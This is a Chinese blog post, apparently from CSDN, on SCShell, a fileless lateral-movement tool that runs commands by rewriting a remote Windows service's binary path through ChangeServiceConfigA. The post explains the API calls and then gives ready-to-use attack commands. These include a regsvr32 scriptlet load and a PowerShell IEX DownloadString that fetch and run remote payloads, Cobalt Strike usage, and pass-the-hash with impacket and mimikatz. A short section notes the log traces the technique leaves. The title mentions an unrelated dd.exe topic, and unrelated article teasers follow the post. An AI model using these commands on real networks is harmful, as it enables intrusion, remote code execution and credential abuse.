windows使用dd.exe的原理_横向移动SCshell使用Service Manager进行无文件横向移动

最新推荐文章于 2024-11-07 23:40:24 发布
最新推荐文章于 2024-11-07 23:40:24 发布
阅读量495 收藏
点赞数
文章标签: windows使用dd.exe的原理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_30399511/article/details/113627519
版权
SCShell是一款利用ChangeServiceConfigA API进行无文件横向移动的工具,无需创建或注册服务。它通过DCERPC进行身份验证和远程操作,可执行命令或加载payload。工具支持py和exe,适用于Windows环境,且可以使用散列传递进行横向移动。利用过程中,服务二进制路径被临时修改为payload,完成后恢复原状,日志会记录相关活动。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.简单介绍

SCShell是无文件横向移动工具,它依赖ChangeServiceConfigA来运行命令。该工具的优点在于它不会针对SMB执行身份验证。一切都通过DCERPC执行。无需创建服务,而只需通过ChangeServiceConfigAAPI 远程打开服务并修改二进制路径名即可(所以要事先知道目标上的服务名称)。支持py和exe两种文件类型。

该实用程序可以在不注册服务或创建服务的情况下远程使用。它也不必在远程系统上删除任何文件*(取决于用于执行的技术)

一切都通过DCERPC执行。执行完成后,服务二进制路径将还原为原始路径

2.技术细节

首先,它创建身份验证,这个工具是使用LogonUserA API和ImpersonateLoggedOnUserA实现的。

6f3e465bce0530bd4c8d231fb62f7351.png

一旦进程获取了正确的身份验证,即可使用OpenSCManagerA远程打开目标主机上Service Manager 

7472033bc0ab412393e6e188dc6c966a.png

使用OpenServiceA API打开远程服务并抛出错误

784e0ebea1dc4118c5d0b79a07d3cac5.png

往下看是通过调用ChangeServiceConfigA API可以实现代码执行的效果。

72bf617772bb73ac4e7ec637e22e46ce.png

通过查看微软文档我们可以知道API的第五个参数是用于启动服务的二进制路径

BOOL ChangeServiceConfig( SC_HANDLE hService      // 打开服务时返回的句柄 DWORD dwServiceType,    // 服务的类型 DWORD dwStartType,      // 何时启动服务 DWORD dwErrorControl, // 错误控制代码 LPCTSTR lpBinaryPathName, // 服务的路径 LPCTSTR lpLoadOrderGroup, // 服务所属的组 LPDWORD lpdwTagId,      // 服务的标记 LPCTSTR lpDependencies,     // 依赖的其它服务和组 LPCTSTR lpServiceStartName,// 服务的启动用户 LPCTSTR lpPassword,     //服务启动用户的密码 LPCTSTR lpDisplayName       // 服务的显示名);https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-changeserviceconfiga

所以作者在第5个参数设置了个payload值,也就是给我们输入的值。这个路径的是绝对路径,这里不多说,可以参考微软的文档。

02b98d7a87b79ea1fd7deb3503c62b67.png

那么上面的代码就是调用ChangeServiceConfigA来将二进制路径名设置为我们提供的有效负载(就是执行我们的lpBinaryPathName中的值,)

可利用点就是在这个位置,原理不难理解,就是ChangeServiceConfigA API中的lpBinaryPathName的值可控。

例如调用powershell来远程加载木马或执行命令等等。

最后就是通过StartServiceA启动服务。

35c4478669a45d629e35cf75f376a2f5.png

代码不难理解。

3.利用手法

作者给出的利用工具有包含exe,py和一个c语言的源码,其中exe和py能实现的功能并不一样。其实我个人觉得exe和py并不是很好用,所以powershell进行远程加载利用的话,我们就不用上传一个exe上去。后面花点时间写出来吧。

1. Windows 使用

Scshell需要以下参数:目标,服务,有效负载,用户名,账号,密码:

1.SCShell.exe 192.168.197.131XblAuthManager"C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll". administrastor Password# XblAuthManager 是 Xbox Accessory Management Service的服务名

例子:

我们使用这种手法来在目标主机中写入一个txt来证明可以利用

在win中 

scshell.exe 10.10.10.10 defragsvc "C:\windows\system32\cmd.exe /c echo ' hello' > c:\windows\temp\lat2.txt" . administrator 1qaz@wsx

c0406ba1c383f20601b894fc3e3c2332.png

在目标机器中我们可以看到写入一个txt

90f7d687f9a1fce1bee5b5f599aa9c2e.png

在cobalt Strike中

shell .\scshell.exe 10.10.10.10 defragsvc "C:\windows\system32\cmd.exe /c echo ' hello' > c:\windows\temp\lat2.txt" . administrator 1qaz@wsx

963213320061baddd9c42424aaba931e.png

2. Linux 安装使用(使用py脚本可以使用散列传递来执行相同的横向移动。)

1.pip install impacket2.git clone https://github.com/Mr-Un1k0d3r/SCShell3.cd https://github.com/Mr-Un1k0d3r/SCShell4.python scshell.py ./administrator:cxzcxz@192.168.52.133# 执行cmd模式,没有命令回显5.python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce # hash验证

注意:无论是使用exe还是py脚本都是没有回显的。

3.可以使用该C程序传递哈希值。

有时情况下,将使用当前进程令牌。您可以使用标准传递哈希方法设置当前流程令牌。

在本地系统上

sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe

然后在新创建的cmd.exe中运行SCShell.exe进行横向。

上面我们使用的是XblAuthManager,其实我们还可以使用defragsvc,msbuild等等

4.实战思路

这个不用多说了吧,简单就是远程调用powershell远程加载ps1上线,或执行一些命令。

shell scshell.exe 10.10.10.10 defragsvc "C:\windows\system32\cmd.exe /c powershell.exe IEX(New-Object Net.WebClinet).DownloadString('http://192.168.50.146:8000/123.ps1')" . administrator 1qaz@wsx

然后还有就是exe的话需要我们有目标主机的明文密码,但是,明文密码不好拿到,所以还是使用py脚本来传输hash进行横向好,当然后面我也会写一个powershell的出来。

从原理出发,举一反三就好

5.日志痕迹

使用用户凭证连接会在目标日志系统留下用户名、来访机器IP和服务超时等信息

0f5735de78416d19f28493c6e4a11f7e.png

5b9a6d8d145654e153ec14de70ecf95f.png

e0d4eed778c0ef08002d73b0cb196400.png

工作组下的横向移动-完全初学者指南
Mccc_li的博客
11-14 1936
文章目录一.测试环境二.横向手法1.系统漏洞类(1).ms17-0102.凭据类(1).使用IPC$进行横向移动1)前提条件:2)攻击手法: 一.测试环境 win7(192.168.100.132)->winserver2016(192.168.100.136) 注意:所有的手法均在没有开启任何防护软件的情况下进行的! 二.横向手法 1.系统漏洞类 (1).ms17-010 2.凭据类 (1).使用IPC$进行横向移动 1)前提条件: 1.对方主机开启admin$和c$等默认共享,通过ipc$连接可以
红队技巧-常规横向手法
Gamma_lab的博客
06-29 1046
前言 域内横向移动技术是红队作战在域内最基本技术之一,红队人员会利用该技术,以被攻陷的系统为跳板,通过已经收集的凭据和密码,来访问域内其他主机,扩大战果,最终目的是获取到dc的访问控制权限。 实操 1.ICP Ipc(共享命名管道),其作用是为了实现进程间通信而开放的命名管道。ipc可以通过用户名和密码建立ipc链接,获取相应的用户权限。 目标机应开放139和445端口,以支持实现远程登陆和默认共享资源的访问 首先需要在跳板机和目标机建立ipc连接 #建立ipc连接 net use \\192.168.75
SCShell:依靠ChangeServiceConfigA来运行命令的无文件横向移动工具
05-13
壳牌 SCShell是无文件横向移动工具,它依赖ChangeServiceConfigA来运行命令。 该工具的优点在于它不会针对SMB执行身份验证。 一切都通过DCERPC执行。 该实用程序可以在不注册服务或创建服务的情况下远程使用。 它也不必删除远程系统上的任何文件*(取决于用于执行的技术) 它是如何工作的 无需创建服务,而只需通过ChangeServiceConfigA API远程打开服务并修改二进制路径名即可。 然后启动服务。 执行完成后,服务二进制路径将还原为原始路径。 原始服务路径是使用QueryServiceConfigA提取的。 一切都通过DCERPC进行,包括身份验证。 用法 当前的版本是用C编写的,但是我将其移植到C#和PowerShell 。 Usage: SCShell.exe target service payload domain username p
使用vw进行移动端的适配_横向移动SCshell使用Service Manager进行无文件横向移动
weixin_39816062的博客
12-11 150
1.简单介绍SCShell是无文件横向移动工具,它依赖ChangeServiceConfigA来运行命令。该工具的优点在于它不会针对SMB执行身份验证。一切都通过DCERPC执行。无需创建服务,而只需通过ChangeServiceConfigAAPI 远程打开服务并修改二进制路径名即可(所以要事先知道目标上的服务名称)。支持py和exe两种文件类型。该实用程序可以在不注册服务或创建服务的...
cmd php 不是内部命令_命令执行底层原理探究-PHP(一)
weixin_39606244的博客
12-26 355
前言针对不同平台/语言下的命令执行是不相同的,存在很大的差异性。因此,这里对不同平台/语言下的命令执行函数进行深入的探究分析。文章开头会对不同平台(Linux、Windows)下:终端的指令执行、语言(PHP、Java、Python)的命令执行进行介绍分析。后面,主要以PHP语言为对象,针对不同平台,对命令执行函数进行底层深入分析,这个过程包括:PHP内核源码的编译、运行、调试、审计等,其它语言分...
windows下的dd
10-14
C:\Documents and Settings\Administrator>dd --list rawwrite dd for windows version 0.6beta3. Written by John Newbigin This program is covered by terms of the GPL Version 2. Win32 Available Volume Information \\.\Volume{f96a7ab8-6270-11e9-b10a-806d6172696f}\ link to \\?\Device\HarddiskVolume1 fixed media Mounted on \\.\c: \\.\Volume{f96a7ab9-6270-11e9-b10a-806d6172696f}\ link to \\?\Device\HarddiskVolume2 fixed media Mounted on \\.\e: \\.\Volume{f96a7aba-6270-11e9-b10a-806d6172696f}\ link to \\?\Device\HarddiskVolume3 fixed media Mounted on \\.\f: \\.\Volume{f96a7abb-6270-11e9-b10a-806d6172696f}\ link to \\?\Device\HarddiskVolume4 fixed media Mounted on \\.\d: \\.\Volume{04f3c464-ee5a-11e9-b217-00e04ca38b2c}\ link to \\?\Device\Harddisk1\DP(1)0-0+8 removeable media Mounted on \\.\g: NT Block Device Objects \\?\Device\Harddisk0\Partition0 link to \\?\Device\Harddisk0\DR0 Fixed hard disk media. Block size = 512 size is 1000204886016 bytes \\?\Device\Harddisk0\Partition1 link to \\?\Device\HarddiskVolume1 \\?\Device\Harddisk0\Partition2 link to \\?\Device\HarddiskVolume2 Fixed hard disk media. Block size = 512 size is 292058824704 bytes \\?\Device\Harddisk0\Partition3 link to \\?\Device\HarddiskVolume3 Fixed hard disk media. Block size = 512 size is 308710211584 bytes \\?\Device\Harddisk0\Partition4 link to \\?\Device\HarddiskVolume4 \\?\Device\Harddisk1\Partition0 link to \\?\Device\Harddisk1\DR7 Removable media other than floppy. Block size = 512 size is 67108864000 bytes \\?\Device\Harddisk1\Partition1 link to \\?\Device\Harddisk1\DP(1)0-0+8 Virtual input devices /dev/zero (null data) /dev/random (pseudo-random data) - (standard input) Virtual output devices - (standard output) /dev/null (discard the data)
windowsdd工具使用
weixin_33924220的博客
04-01 5147
Windows下img or iso文件的驱动的制作 下载ddforwindows工具dd-0.6beta3.zip(下载地址http://www.chrysocome.net/download),下载后将解压得到的这些文件dd.exe拷贝到c盘的某个路径下比如 在windows的dos窗口下转到dd.exe所在的目录,用命令dd.exeif=f:\m...
SCShell: 利用ChangeServiceConfigA API实现无文件横向移动
SCShell是一种利用ChangeServiceConfigA API的无文件横向移动工具,主要用于在计算机网络中进行攻击或安全测试。它的核心机制是通过远程修改服务的二进制路径来执行特定命令,从而无需在目标系统上创建或注册任何新...
一本你不能错过的红蓝攻防鸿篇巨著
等风来
10-27 6355
本书是一本针对安全领域的红蓝攻防对抗的专业书,既能作为安全从业者在红蓝攻防对抗活动中的指导用书,又能成为企业安全部门构建纵深防御体系的参考指南。希望本书所分析、讲述的红蓝双方视角下的攻防对抗手法,能帮助各行业的网络安全从业者增强实践、知己知彼,从企业内部构建起安全防御体系。
dd for windows
04-07
dd工具dd工具
windowsDD下制作linux引导信息
09-04
解压出来,将dd.exe文件放到c:\windows\ 下。 在windows下打开cmd(dos控制台) 输入: dd --list 可以查看分区 再用dd命令读出引导信息。 格式如下: dd if=AAA of=BBB bs=512 count=1 BBB为你读出的文件。 ----------------------------------------------- 举个例子: 比如我的linux系统装在硬盘的最后一个分区,用dd看到的结果如下图片: 那么我就运行命令: dd if=\\?\Device\Harddisk0\Partition6 of=c:\linuxOS bs=512 count=1 运行完后会显示: 1+0 records in 1+0 records out 这时c盘下会多出linuxOS文件 我再打开C盘下的boot.ini文件(这个文件是被系统隐藏的,要现实系统隐藏文件才看得到),添加一行: c:\linuxOS="linux" 保存。 dd if=\\?\Device\Harddisk0\Partition2 of=c:\linuxOS bs=512 count=1
Windows下面的DD工具
热门推荐
jiangwei0512的博客
11-29 4万+
Windows下面的DD工具。
内网windows横向移动及ssh建立端口转发
weixin_44268185的博客
08-20 268
【代码】内网windows横向移动及ssh建立端口转发。
SCShell:无文件横向移动工具的革命
gitblog_00050的博客
05-14 461
SCShell:无文件横向移动工具的革命 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 SCShell 是一款创新的无文件横向移动工具,它利用 ChangeServiceConfigA 函数在不进行 SMB 认证的情况下远程执行命令。这个工具的独特之处在于,它无需注册服务或在远程系统上创建文件(取决于执行技术)即可工作。 项目技术分析 SCShell 不是通过创建新服...
从裸机启动开始运行一个C++程序(五)
fl2011sx的博客
06-29 921
《从裸机启动开始运行一个C++程序》的第五篇,引入了80286模式
11月7日(内网横向移动(二))
最新发布
m0_74736832的博客
11-07 946
目前有两种常见的利用方法:一是通过调用WMI的类方法进行远程执行,如Win32_Process类中的Create方法可以在远程主机上创建进程,Win32_Product类中的Install方法可以在远程主机上安装恶意的MSI;与传统的创建远程服务的方法不同,SCShell利用提供的用户凭据,通过ChangeServiceConfigA API修改远程主机上的服务配置,将服务的二进制路径名修改为指定的程序或攻击载荷,然后重启服务。②远程主机防火墙放行135端口,这是WMI管理的默认端口。
ChangeServiceConfig函数
gaobc的专栏
09-28 2042
ChangeServiceConfig函数可以配置更多关于服务的信息,下面列出其原型:BOOL ChangeServiceConfig( SC_HANDLE hService      // 打开服务时返回的句柄 DWORD dwServiceType,    // 服务的类型 DWORD dwStartType,      // 何时启动服务 DWORD dwErrorCon
内网横向——利用系统服务
qq_55202378的博客
07-27 481
网络拓扑:攻击机kali IP:192.168.111.0跳板机win7 IP:192.168.111.128,192.168.52.143靶机win server 2008 IP:192.168.52.138。
Windows下Win32 Disk Imager和Linux中dd命令两种方式烧录树莓派镜像
手中沙的博客
01-02 2030
【版权申明】未经博主同意,谢绝转载!(请尊重原创,博主保留追究权) Windows下Win32 Disk Imager和Linux中dd命令两种方式烧录树莓派镜像 步骤1: 下载操作系统的镜像 官网链接:https://www.raspberrypi.org/downloads/raspbian/ 步骤2:下载并安装Win32 Disk Imager 官网链接:https://sourcef...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值